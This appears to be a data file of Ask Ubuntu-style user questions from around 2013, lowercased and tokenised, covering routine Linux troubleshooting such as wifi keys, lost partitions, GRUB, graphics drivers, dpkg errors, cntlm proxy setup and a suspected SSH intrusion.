367033	wifi function key not working on hp laptop	i have an hp pavilion g7-1260 with ubuntu 13.10 on it . i would like to be able to use the wifi toggle key on the keyboard to enable and disable wifi . my wifi works fine and the light on the key turns on when i enable wifi through the ubuntu networking menu . the problem is that pressing the key does not do anything . it should be activated when i press fn + f12 . i tried using xev to see if an event was generated but there was n't one . i also tried the same thing with apci_listen but it did n't output anything . does anyone know how to get the key to work ?
367034	how to log all applications that startup automatically ?	i 'm using xubuntu and recently i encounter this problem : when the computer started up , a main window files manager appeared automatically and i do n't why this happens . there are bunch of startup applications and i ca n't locate which one of them causes this . is there any solution ? thanks !
367040	lost extended partition after installing windows	i was using ubuntu 13.04 and the hard disk was partitioned as follows : primary ext4 ( 250gb ) linux extended ( 250gb ) and ext3 or ext4 logical partition linux swap ( 4gb ) i have installed windows 7 , and during the installation i have deleted the linux primary partition and created windows ntfs primary partition on its place and installed windows 7 on it . i thought that using any ext3/4 reader i can extract the data on my logical partition but all the tools i used only view the extended partition with un-located space ! ! as there is no logical partition at all . i have tried to boot to ubuntu using the live cd but it did n't mount the partition and even when i used the default partitiion management tool it showed the same result of extended partition with un-located space . please help me to recover the data in the extended partition .
367046	usb mouse and keyboard not working in linux 4 tegra	i 'm new to tegra linux development . i have a tamontem ng evaluation board with the tegra 3 chip . i installed l4t sample file system from nvidia tegra resources ( https : //developer.nvidia.com/linux-tegra ) and installed the file system as described in the documentation provided in nvidia site . already there was an sd card with l4t running . i do n't want to change the boot loader . so i copied the boot.scr.uimg to root ( / ) folder and uimage to boot ( /boot ) and it starts booting from the existing sd card . after that while booting , some errors occurred in some bluetooth devices ( there is no bluetooth device in the board ) . so i disabled bluetooth by giving the following command : sudo mv /etc/init/bluetooth.conf /etc/init/bluetooth.conf.noexec now the problem is that mouse and keyboard are not working . so i ca n't login . even though i installed desktop , the mouse and keyboard are not working . but mouse and keyboard are enumerating . the lsusb command is showing the usb mouse and keyboard . the installed file system is ubuntu 13.04 linux kernel version is 3.1 what to do ?
367047	problem when trying to update `` duplicate sources.list ''	i got this problem when trying to update using sudo apt-get update w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ saucy-backports/multiverse amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_saucy-backports_multiverse_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ saucy-backports/multiverse i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_saucy-backports_multiverse_binary-i386_packages ) w : you may want to run apt-get update to correct these problems this is my souces.list : # deb cdrom : [ ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) ] / saucy main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu saucy main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu saucy-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu saucy universe deb http : //archive.ubuntu.com/ubuntu saucy-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu saucy multiverse deb http : //archive.ubuntu.com/ubuntu saucy-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu saucy-backports main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu saucy-security main restricted deb http : //archive.ubuntu.com/ubuntu saucy-security universe deb http : //archive.ubuntu.com/ubuntu saucy-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu saucy main # deb-src http : //extras.ubuntu.com/ubuntu saucy main # deb http : //archive.canonical.com/ saucy partner # deb-src http : //archive.canonical.com/ saucy partner # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu saucy-backports multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software .
367048	having trouble with ubuntu installing on galaxy s3 d2vzw	where/what would be the best way to go about doing this ? i have my old s3 from verizon wireless and wan na play with ubuntu on it a bit to see if its something id be interested in . anyone able to help or point me in the right direction ?
367049	big menu in gedit on ubuntu saucy	im kinda new to ubuntu and for some reason the gedit context menu became three times the normal size one day ... ..i dont remember any changes i made before that ... .i looked around in gconf editor for ideas but found none ... .and google had nothing about this kind of thing.if someone could tell me where the context menu settings are that might help ... .a good day to you all . cheers ! btw i did try apt-get remove purge* gedit ... .restarted then tried to apt-get-install but still got big right click menus in gedit oh and i just installed saucy so this might be a result of that but it might have been happening before ... .i do not remember exactly
367055	upgrade from 13.04 to 13.10 preferences has two of most everything	i upgraded from 13.04 to 13.10 and in menu > preferences there are two or more of many items in there . for instance bluetooth , displays , online accounts , power ... i 'm using cinnamon . how can i remove the duplicated items ?
367057	ubuntu 13.10 ati radeon hd 6650m	i upgraded to ubuntu 13.10 and tryed to install the driver for my grafik card ati radeon hd 6650m via synaptic . there are two drivers to choose but when i try to install them nothing happens , the installation starts but then is nothing happen . what can i do to solve this problem ? ? ?
367064	why am i having so many problems installing ubuntu 13.10 alongside vista ?	i am trying to setup my laptop to dual boot ubuntu 13.10 and windows vista . i get as far as the drive table and it either freezes up or i get an error saying `` unable to satisfy partition parameters '' or something very similar . now i just have a black screen with alternating indications that a request for cache data failed and something to do with a `` write through '' . any ideas on what i might be doing wrong ?
367065	linux kernel 3.10.17 upgrade in 12.04 64bit ?	i found an article on g+ about needing to upgrade the kernel to 3.10.17 for ubuntu versions from 12.04 through 13.10. http : //ubuntuhandbook.org/index.php/2013/10/linux-kernel-3-10-17-upgrade-ubuntu-linux-mint/ is this suggested ? has anyone found any problems with it ? and why an urgent upgrade ? my current one is 3.8.0-32-generic
367066	500 oops : vsftpd : refusing to run with writable root inside chroot ( ) login failed	i have tried : ufw and selinux is shutdown sudo chmod 755 ftp allow_writeable_chroot=yes how to solve the problemďź
367070	how to make the fujitsu lifebook t5010 screen rotate ?	i recently purchased a fujitsu lifebook t5010 . it came pre-loaded with linux mint olivia . i had a hard time figuring out how to use linux mint and installed ubuntu 13 . 04 on my laptop . since i installed ubuntu my screen has stopped rotating when i turn it into tablet mode . is there a website that i need to go to download a driver or a program so that the screen will auto-rotate when i switch it to tablet mode ?
367071	grub menu not appearing after install and boot repair	so i was finally able to install ubuntu . however , when i went to restart my computer , it automatically booted to windows 7 . i did some research and went back into ubuntu with my liveusb and tried running boot-repair . here is the output : http : //paste.ubuntu.com/6316244/ it said that my boot was successfully repaired , but when i went to restart my computer again , it booted to windows . i tried the command upgrade-grub in the terminal from a suggestion in another question but got this respone : you must run this as root what does this mean ? or , what should i do now ? thanks !
367073	`` install ubuntu with the windows installer '' is not working on windows8	i have followed alll the steps given in `` install ubuntu with the windows installer '' following link : http : //www.ubuntu.com/download/desktop/install-ubuntu-with-windows everything as per given step appears on my windows8 laptop . after rebooting & choosing ubuntu from the menu gives me a an error that : \ubuntu\winboot\wubildr.mbr file not found ubuntu could not be loaded because some of the files needed are missing . the other observation from myside is during installation , step 5 given in above link should take a few mins time ( since its downloading 500mb files apprx as per said in instructions ) but in case of this installation it only takes 20 sec . does this has something concerned with the installation ? plaese help i need to use ubuntu on very urgent basis , i am a ubuntu user from last 2 years & missing using it on my new laptop . kindly guide . thanks in advance .
367074	my computer may have been compromised , what should i do ?	a few weeks ago , my machine ( lets call it `` main '' ) was logged into wirelessly from an unauthorized host , probably using ssh . i did not detect the intrusion until a few days ago , and my machine is completely shut down . i found the login using this line from last : myusername pts/1 ipad tue oct 15 22:23 - 22:25 ( 00:02 ) needless to say , not only does no one in my family own an ipad , but almost none of my friends do , either . this makes me suspect that whoever was behind this changed the hostname of their machine . additionally , i discovered this line in the last output on another machine of mine ( `` secondary '' ) : myusername pts/2 :0 tue oct 15 22:23 - 22:23 ( 00:00 ) this line coincides with the timestamp from main , which has password-less ssh access ( through keys ) to secondary . is it possible that whoever broke in to main has also rooted secondary ? how can i prevent this from happening again ? are there logs that i can look through to determine exactly how main was accessed ( i am the only user on the system and have a very strong password ) ? is it at all possible that this is just a weird bug that occurred ? should i , and where should i start looking for rootkits and/or keyloggers ? in short , what should i do ?
367079	strange boot.log - multiple startpar bridge ... starting and stopping repeatedly	i 've just encountered a very strange boot ( since i have no `` quiet '' nor `` splash '' in grub options ) . so i 've had a look in the log : crysman @ crysman-u36sd : ~ $ cat /var/log/boot.log * starting bridge file events into upstart [ ok ] skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd * starting systemd login management service [ ok ] * starting apparmor profiles [ ok ] * starting bluetooth daemon [ ok ] * starting startpar bridge for notification of upstart job start/stop [ ok ] * stopping startpar bridge for notification of upstart job start/stop [ ok ] * starting mdns/dns-sd daemon [ ok ] * starting reload cups , upon starting avahi-daemon to make sure remote queues are populated [ ok ] * starting reload cups , upon starting avahi-daemon to make sure remote queues are populated [ fail ] * setting sensors limits [ ok ] * setting up x socket directories ... [ ok ] * stopping system v initialisation compatibility [ ok ] * starting network connection manager [ ok ] * starting system v runlevel compatibility [ ok ] * starting [ ok ] * starting automatic crash report generation [ ok ] * starting [ ok ] * starting cups-browsed - bonjour remote printer browsing daemon [ ok ] * starting restore sound card state [ ok ] * starting acpi daemon [ ok ] * starting anac ( h ) ronistic cron [ ok ] * starting [ ok ] * starting [ ok ] * starting save kernel messages [ ok ] * starting [ ok ] * starting [ ok ] * stopping restore sound card state [ ok ] * starting cpu interrupts balancing daemon [ ok ] * starting startpar bridge for notification of upstart job start/stop [ ok ] * stopping startpar bridge for notification of upstart job start/stop [ ok ] * stopping restore sound card state [ ok ] * starting startpar bridge for notification of upstart job start/stop [ ok ] * stopping startpar bridge for notification of upstart job start/stop [ ok ] * stopping save kernel messages [ ok ] * starting regular background program processing daemon [ ok ] * stopping anac ( h ) ronistic cron [ ok ] there are repeating entries , start/stopping over and over , empty entries like `` * starting '' ... why is that so ? any cause you might think of ? that `` startpar bridge '' and empty `` starting '' entries had certainly not been there until today ( i 've installed some stuff ) . thanks a lot i am running xubuntu 13.10 ( fresh install 3 days ago ) additional debug info : cat /proc/cmdline boot_image=/vmlinuz-3.11.0-12-generic root=uuid=751f644f-5523-465f-bbaa-ef75ed4373f1 ro i915.i915_enable_rc6=1
367083	how to disable third party repositories ubuntu 12.04	i wanted to install skype but as i installed the software , it was not correctly installed and gave an error on update that i have to disable third party repository . i want to know what 's that mean , how to disable it and doe this effect the system ?
367085	any pointers to installing 12.04 on a single core dual xeon processor server ( 32 bit ) with a new hard drive	i was given an older 32 bit single core dual xeon processor server . i 'm hoping to make a file server out of it . it has 5 new 320gb scsi hd drives and 12gb ddr266 ecc reg memory on an intel se7501hg2 mother board . i 've never installed ubuntu linux or any kind of linux before . so saying i 'm green would be an understatement . and there is no way i 'm shelling out $ 600.00 or more for a windows os . so ubuntu it for me ... if i can just figure out where to start ...
367088	dahdi 2.6.1 does not build in linux kernel 3.8.0-29-generic	i downloaded source codes of dahdi 2.6.1 and linux kernel 3.8.0-29-generic . when i typed 'sudo apt-get install linux-headers- $ ( uname -r ) ' to install linux kernel header i got the message shown below : reading package lists ... done building dependency tree reading state information ... done linux-headers-3.8.0-29-generic is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . i am facing problem when i try to compile and install dahdi on my ubuntu server . it displays me the messages displayed below : /home/asteriskpbx/src/asterisk-complete/dahdi/2.6.1+2.6.1/linux/drivers/dahdi/wctdm.c:2604:22 : error : expected '= ' , ' , ' , ' ; ' , 'asm ' or '__attribute__ ' before 'wctdm_init_one' /home/asteriskpbx/src/asterisk-complete/dahdi/2.6.1+2.6.1/linux/drivers/dahdi/wctdm.c:289:22 : warning : 'ifaces ' defined but not used [ -wunused-variable ] /home/asteriskpbx/src/asterisk-complete/dahdi/2.6.1+2.6.1/linux/drivers/dahdi/wctdm.c:2592:13 : warning : 'wctdm-reset_tdm ' defined but not used [ -wunused-function ] and so on ... at the end of compilation messages , it displays : cc1 : some warnings being treated as errors make [ 3 ] : *** [ /home/asteriskpbx/src/asterisk-complete/dahdi/2.6.1+2.6.1/linux/drivers/dahdi/wctdm.o ] error 1 make [ 2 ] : *** [ _module_/home/asteriskpbx/src/asterisk-complete/dahdi/2.6.1+2.6.1/linux/drivers/dahdi ] error 2 make [ 2 ] : leaving directory '/usr/src/linux-headers-3.8.0-29-generic' make [ 1 ] : *** [ modules ] error 2 make [ 1 ] : leaving directory '/home/asteriskpbx/src/asterisk-complete/dahdi/2.6.1+2.6.1/linux' make : *** [ all ] error 2 i am a newbie in this regard . kindly help me figuring the problem out , and also guide me to the solution of the problem . it 's a bit urgent ! regards , nazish kanwal
367097	probem with nltk installtion	i want to install python nltk . but i got problem with installation of setuptools : http : //pypi.python.org/pypi/setuptools i follow the steps given in read me file but i got problem with ( -- prefix not recognized ) please any buddy can help me solve these problem
367098	is it possible to run four os 's on a single laptop with 1tb hdd and 8gb ram	i want to install kali linux on my laptop which was preinstalled with windows 8 , windows 8.1 , ubuntu 13,04 . windows 8 installed on dev/sda1windows 8.1 installed on dev/sda6ubuntu 13.04 installed on dev/sda8i want to install kali linux on dev/sda3 partition.is that possible to install and boot all four os 's ?
367099	ubuntu boot error : dual boot mode	i 'm using dual boot mode with windows7+ubuntu 12.04 ( both 64 bit ) . i firstly installed windows and then ubuntu through linuxlive usb . used it for 2-3 days , installed some packages related to i386 needed for makin some environment setup . restarting my laptop shows the grub but running ubuntu returns error : could not write bytes : broken pipe , while the windows working fine . please help .
367100	device not ready firmware missing	machine : hp dv9925nr , stock hardware . os : ubuntu 12.04 lts issue : broadcom wireless card seems to be missing firmware , according to error code from networking menu : device not ready ( firmware missing ) . more info : i 'm a truck driver , on the road , no ethernet connection available . if there is a driver or firmware file that i can download online , i can download with my tablet and transfer the file ( s ) to my laptop via sdcard . stumbling around : alright , with no replies , i stumbled around in the forum for several hours and came up with this : https : //help.ubuntu.com/community/wifidocs/driver/bcm43xx , which pointed me in the right direction . as it turns out , the chip id is bcm4322 the pci-id is [ 14e4:432b ] . i then went to this page : http : //wireless.kernel.org/en/users/drivers/b43 , which tells me that my wl card is partially supported . following the directions here : , i was able to download the file packages i needed , fwcutter , and the firmware b-43 . i moved those files to the home directory on my dv9925nr , and opened the fwcutter package in ubuntu software center . a page came up showing the file information , but the install button is greyed out and unclickable . i also followed the directions here : , to un black list my card and the software . so now i believe i 'm supposed to install fwcutter , then use the terminal to install the firmware which is stored locally . is that the right track ? resolved i managed to resolve this issue connecting an ethernet cable and letting the os figure it out .
367101	this kernel requires an x86-64 cpu but detected an i686 cpu when installing on netbook with 32bit image	i 'm trying to install ubuntu on my samsung n130 and i 'm having some trouble . exact error message is this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropriate for your cpu . the netbook has intel atom cpu n270 and i used universal-usb-installer to boot from usb i downloaded 13.10 desktop ubuntu 32bit got that error message . so i downloaded 13.04 desktop ubuntu 32bit and got that message again . i 'm 100 % sure i downloaded 32bit i searched but there are only help for running it on virtual machine or suggesting using 32 bit ubuntu . note : all downloaded from http : //www.ubuntu.com/download/desktop and i chose 32 bit for both . any help would be greatly appreciated .
367104	how to enable chameleonic background using gtk webkit ?	i have written the code and chameleonic background is working with node webkit . but it is not working with gtk webkit .
367109	how to add the folder path to ftp user	i have 2 questions : how to add the folder path to ftp user ? how to create a ftp site in ubuntu ?
367111	how can i install faience gtk theme in ubuntu 13.10 ?	i have tried adding the ppa and installing through the terminal , but this did not work . is there any way i can get the most recent version of faience gtk theme as a .deb file so it can be installed via the software center ?
367112	keepass 2.23 nukes lightdm on saucy	wondering if anybody else has run into this . brand new installation of saucy . keepass 2.23 install through ubuntu software center . the instant i choose file - > open - > open file , lightdm crashes and restarts back at the login screen . makes keepass pretty unusable . i 'm not sure which specific logs would be most interesting , i 'm happy to post them if anybody has suggestions .
367114	error code 1 : file not found	when i sending a file through tftp remotely it shows an error like error code 1 : file not found , what is the problem ? , what is the solution ?
367115	which packages are needed for a full kubuntu desktop ?	i changed from xubuntu 13.10 to kubuntu by installing the package kubuntu-desktop with its dependencies by sudo apt-get install kubuntu-desktop but the system seems to lack some features , i think . so are there any packages that are usually installed from a fresh kubuntu-cd that are missing when you just swap from xubuntu ?
367118	how do i add a starter for smartgithg a in kde ?	i would like to add a starter for ~/smartgit/bin/smartgithg.sh in the taskbar ( or how is it called ? ) usually if i have started a program , i can right-click on it and say „einen starter für dieses programm anzeigen , wenn es nicht läuft“ ( in english i would say `` show a launcher when not running '' ) but for smartgit , if i do that and later want to use it , i just get file : //java doese n't exist or how can i change the launcher ? in ~/.kde/share/config/plasma-desktop-appletsrc i have an entry : file : java ? wmclass=smartgit % 2fhg java=file : java , ,java , ,ivborw0kggoaaaansuheugaaaeaaaabacayaaacqaxheaaaabhncsvqicagifahkiaaaaalwsflzaaaujqaaek0bdob8qgaacwrjrefuejztm3tw1nuvxz+/1z4isyakbihgqkmcgjwuysmpoqit1vbrqkclog5wo7z2nnzhsvapvkbqa6xtp3xamnaq2apkraez2lpjaa0w5fxa0mhdsulaqnjnzvf3up1j9y53f9nnbshjrf3oxllz3n/vnvm9555z7vnx08gpryu/nygqub7mpaqomicr/qz3ovd9as89xmbjf84jdbbqa2uhndu1ryjfygdt23bfcq7btt1ylhawqalprw1t7rdaiofhdsc4atwqc2oxwfuphe4rxgkxtlwrvl0ibpf5dqcysnjenbo9wmoh+xrraprozwxlcccgwr+8vr5+damf6y/u19evbsobxscv7morkipm9szwndhi61oogdlir8rkysplk1b/ia1rbdblmgshg8fpwt7pi7suydjbqcevgj5tsegtacd+sxm80dp/fjrxgqglfqdu+iyaugtqapsmgpcbmlnykxdltxwgzn8v6dgedyx+gb+/wc+4m4b19/kd0k8erf2zkccew0sykqcn8enreclvqng00hsi/ujau2mrd93xlhv2hcn6fsbmsqgh0dqt8xngycotxd9ndcmryvpctj4lqajboz99mvde3yrwdeq0ymleu/a8d13xszxg1y42xtqxmctph8gprpzqlyl2xrcsw7edl1+ylnwvdfyeibw28dwxz/mqqicewpm8dh+i4hkwwjb4cvecc5bu8ebwpr4ss/c9olu1yqk7nmp7zgn01viuhjyq13xrna1n0zje8mbwxqx5ut3a91fvyfybe3h0wdkmjyr6vd5e9ybf//i1rrzisbbvbkfqv338msnw3c4eshh3kc6tny3/htw49gf/4alxd/smyl1dwkz393d5zy/z7pj/4+xsvislaokrrpzagutnzikvcwj4kjh3wtewegzlgxc/xmfghko9ixrptkasludersvy8o7uwpofyoxpq7jt9jleigoyfjfddv1ohrrkqlod0plbppuanz9fz7ndglh63wtkqsevhkaqntrrcfhxnquxp/swtz/9bq7nfpw7igtwzvtmmg58nbquy1kwwwcqucheibdanm0maclkkrfrd7h09sba9edbe1tokm/ngshx55zahfhrng02slnbboyqp8a9d6+g+wbr4uwaoxngc838yzk8b5omgucauchembgkeaig6zpccgzbjplm0thrgw3blks7wnq9dp5r2mldtzth55/f2jhftta7tybtu/z43pdzt347aau2olazvjxvf3cg5yntuvvxdqzdwlisaoeawwcqydcizvlomobnedi2tudhbx0dhsstsvzxptxq8mjfdrhhdhz8wql5luefhokb+wdjgv2ht24r8orl23jiibuknfwbssiytrysmmk502syvtc0lut5drigaydrujiokyegkujgoa6el3qu99b7cx73bjtxo/c2clk2d86t5djpj/emgmb9r7jrey+yd//+gosinm6zussncydnoo26rqproqzpyppmhgdlsrasc9m0mxwg9ibkmkkikscrsgdbno7jhmssapxmfsvrw3sexiibcuahby8vmmjiiqo6t8dsh15nzdp3efrhide0pmktt01nre0ky3xp8ljxvwnlsjama11rqgib4zgzeurwhcfjcflg1hte4fg6npq9wt6gus5fpspcoq+dlzoannffcmgo0uprdauokb9tt9lc3m7wkqozffevl7+bpolhgbmsjdzpwzcmrnohnkproo7jzaqn5jahqe3qmvybmhimqsrlomxleyhpa9sijbzlcp89f2hj5p1fbb5taozx+x0zgvjr1snqhmfkrk4efurjujlgev4mhkipkkm1musr11t4r92aasdnzfoyxm3xwnxjkasfmmsq63beaqryugjbttm2pymhh/orbe2hc5kgy3dpjro5fug0tsplavrbjfqsze2gyrbsxsmrth/f0qubvukzueeigiamgpwlg0pcxgl8yicsczljjlzt88lyhaxzsxvpswskeskbyh33x8bestvzyqfzz3mnjegtddfvpsk9f27gkfu4ywk4llecanlvtmqsdjuhhpwespet0vggjnu2ir7t4bdpbmb3vsaitswkiafx4jkvufyw7fj5pwntcydff9zjv/a3iwrlfwrjqw7fos9cjgrmpvtzbeksiiladd1okckfkbdvo8yy326iw44wjmhqlg666xyuuxzquqq8v34/p1/3ayki2mqr4bbwcodxw62slksww5kaoj1aeogajqqhyggslfxccw2s+8footllxxoncvcpl8plwv+aytz5p/fy1154ixnc44krotdmslwasths6w11sov7ceiubv2vm/q9pyujibj6utp40mwjeoqjdxzy3eye/40gwkb0m8ofkmzhzffldby2qxwvknefjbkgug1mgyncx2jkrppdwt6favrkeaa2j+vn/xlzhzkeycctrfdnz8pbb/n9mxtjuu05zt93xim4rps5/mj1rv3vvvzeewvr/tinbpgu4pytjsmvr+dkffikhnkjggmrwe6w+8ppgq7r2ladsvee5zfpagvnt5nlh5bt5k13dog6lytogemqcrwnkxxkevtjys4v1wxmhm7wjalbnflbvbpiemquoktvxorkr04cjnrenwrbdsmsdiysbbasupf0lklvi5bdlqaertcua+o6xyyharofhepg5xeoasefdw6dfqq6ouuss6xi6k/5d7/b5ykhewhy9ow/qjat8vtmb2zqmpyhwnvdbley/ojbz/ppugm8v3wtlrwdsg074/zye9xv5+gbaifny944i9mjditwcn3chyt/is3nqpqo1wa3cpat4a/f/qsobmtsmmp2mgae90wapkxkyjhzxndlywexrlv0nkzwmtw4rufhy8yx7u7f6/j7/15xfc6nfe4cupqct2k1q6ieimk0di0xy8szzbza6r7/uufm3tubi1um6oymeajhqh5395fyudy9gf1yepdla/ldvpugsy4kq02vcp561gbwhiewdoegpnp550lmhx2sts6tlnui/qo0anw/bmuoftwe+bflty0kcaoyavndcehcdjizmszn5xjoionjzcufk8ipabi77l4uad25gz8ewruokdqfslshdq3u+ei43f3jdrs5ap2ahdt7dbxkuk1asr6qiwji3ha6rmfu53dvgstvgkato9t8nqup0borq+irb+sc6g3s+vj7oflvgnkoqs2x1xtlvugld1dhv87/wx0spcqs7v1ckv29pjcul+hegoswptuvi3xuqpkqr65qlc3xz+sndclatgsfrxscf+vlb03pgf4t1ffodwkgc+tlqk2t6u99iziqaf0hsp5qxeis4mxjcreohzvzwjqsvrnkvmhjftwef6rfn9pth+zdhw9haclhcj8s/nga1c2tqw14kod4jh07tgfuvvv1qve/cdb1naqqkgdsusyh1ygzgbgbqgdk3r17n6uurg7ztk1lswvxelzk26gnme2tcdhmvvuvlmxr3nzcuvtboz+ztg4agih92hwwzd68eysbgxvj4hokxsbg+lx58xydu9i6z1w9afqdsyzlwrhy5cpndq0nswg06pva6j4igo16dq0nszurv26ylgshmcutawco9whli1odgrrgzkck1dodaeu9h/1ywgwswfggbdghfagcjh0e1ysrkuqla0i5r4tuq2xyzemt7bu6kr42qyb3fdgctjn6i1wa/b/puhe6iikz7waaaabjru5erkjggg== this seems broken somehow . is it connected to the fact , that i have installed smartgit in my homedirectory under ~/smartgit/bin/smartgit.sh ?
367120	problems connecting to internet via ethernet ( rtl8101e ) and wifi ( rt3290 )	helo , i have some problems connecting to internet with both wifi and ethernet . when i installed ubuntu 13.10 everything worked fine , but a few days now , wifi disconnects after 1 - 2 minuites and ethernet fails to connect at all . my network configuration is this ( i cant post images ) i run ubuntu 13.10 on hp sleekbook 15 . thanks in advance !
367129	how to repair e : sub-process /usr/bin/dpkg returned an error code ( 1 ) on ubunt 13.4	update-initramfs : deleting /boot/initrd.img-3.8.0-33-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.8.0-33-generic /boot/vmlinuz-3.8.0-33-generic generating grub.cfg ... found background : /boot/grub/piotrfurman4.jpg found background image : /boot/grub/piotrfurman4.jpg found memtest86+ image : /boot/memtest86+.bin found windows recovery environment ( loader ) on /dev/sda1 found windows 8 ( loader ) on /dev/sda2 found windows 8 ( loader ) on /dev/sda3 /etc/grub.d/30_os-prober.save : 30 : /etc/grub.d/30_os-prober.save : = : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-extra-3.8.0-33-generic.postrm line 328. dpkg : error processing linux-image-extra-3.8.0-33-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.10.10-031010-generic linux-image-extra-3.5.0-40-generic linux-image-3.5.0-40-generic linux-image-extra-3.8.0-30-generic linux-image-3.8.0-30-generic linux-image-extra-3.8.0-31-generic linux-image-3.8.0-31-generic linux-image-extra-3.8.0-33-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
367130	cntlm : no proxy service ports were successfully opened	i 'm trying to setup cntlm on an ubuntu vm and keep hitting a brick wall with the above error message . here are the steps i 've taken : install cntlm $ ls cntlm_0.92.3-0ubuntu0.1_i386.deb cntlm.conf $ sudo dpkg -i cntlm_0.92.3-0ubuntu0.1_i386.deb selecting previously unselected package cntlm . ( reading database ... 29361 files and directories currently installed . ) unpacking cntlm ( from cntlm_0.92.3-0ubuntu0.1_i386.deb ) ... setting up cntlm ( 0.92.3-0ubuntu0.1 ) ... adding system user `cntlm ' ( uid 106 ) ... adding new user `cntlm ' ( uid 106 ) with group `nogroup ' ... creating home directory `/var/run/cntlm ' ... starting cntlm authentication proxy : cntlm . processing triggers for ureadahead ... processing triggers for man-db ... copy my cntlm.conf to the right place $ cat cntlm.conf username [ redacted ] domain aus workstation ws0585249 passlm [ redacted ] passnt [ redacted ] passntlmv2 [ redacted ] proxy [ redacted ] :8080 noproxy localhost , 127.0.0 . * , 10 . * , 192.168 . * listen 3125 $ sudo cp cntlm.conf /etc/cntlm.conf restart cntlm $ sudo invoke-rc.d cntlm restart stopping cntlm authentication proxy : cntlm . starting cntlm authentication proxy : failed ! restarting service failed , attempt to start manually ? $ sudo cntlm -vc /etc/cntlm.conf section : global , username = ' [ redacted ] ' section : global , domain = 'aus' section : global , workstation = 'ws0585249' section : global , passlm = ' [ redacted ] ' section : global , passnt = ' [ redacted ] ' section : global , passntlmv2 = ' [ redacted ] ' section : global , proxy = ' [ redacted ] :8080' section : global , noproxy = 'localhost , 127.0.0 . * , 10 . * , 192.168 . *' adding no-proxy for : 'localhost' adding no-proxy for : '127.0.0 . *' adding no-proxy for : '10 . *' adding no-proxy for : '192.168 . *' cntlm : no proxy service ports were successfully opened . exitting with error . check daemon logs or run with -v. the vm is a fresh copy of precise32 being run via vagrant and virtualbox on a windows 7 host . i 've also tried changing the port cntlm listens on and a previous version of cntlm ( 0.91~rc6 ) . i have n't managed to turn up much information on the specific error message and have just about exhausted my skill set here . the primary objective here is simply to authenticate against an ntlm corporate proxy so things like apt-get and wget are usable . i 'm open to other solutions which would achieve this aim .
367131	uninstall ax88179 package	i 've installed the ax88179 package from the ppa ( since the ax88179 driver is n't in the 3.8 kernel ) . but now i 'd like to install kernel 3.11.6 and this module is already included here . so i 'd like to uninstall the the module from the package but this fails with the following error message the following packages will be removed : ax88179* 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . after this operation , 313 kb disk space will be freed . do you want to continue [ y/n ] ? ( reading database ... 202833 files and directories currently installed . ) removing ax88179 ... error ! there are no instances of module : ax88179_178a 1.6.0 located in the dkms tree . rm : can not remove ‘/usr/src/ax88179_178a_linux_driver_v1.6.0_source’ : no such file or directory dpkg : error processing ax88179 ( -- purge ) : subprocess installed pre-removal script returned error exit status 1 no apport report written because maxreports is reached already ln : failed to create symbolic link ‘/usr/src/ax88179_178a_linux_driver_v1.7.0_source’ : file exists error ! dkms tree already contains : ax88179_178a-1.7.0 you can not add the same module/version combo more than once . module ax88179_178a/1.7.0 already built for kernel 3.8.0-32-generic/4 module ax88179_178a/1.7.0 already installed on kernel 3.8.0-32-generic/x86_64 errors were encountered while processing : ax88179 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) it complains about both version 1.6 and 1.7 . i 've updated to 1.7 a couple of days ago . -- force does n't help either . i just want to get rid of it since when i 'm running 3.11.6 the versions interfere with each other .
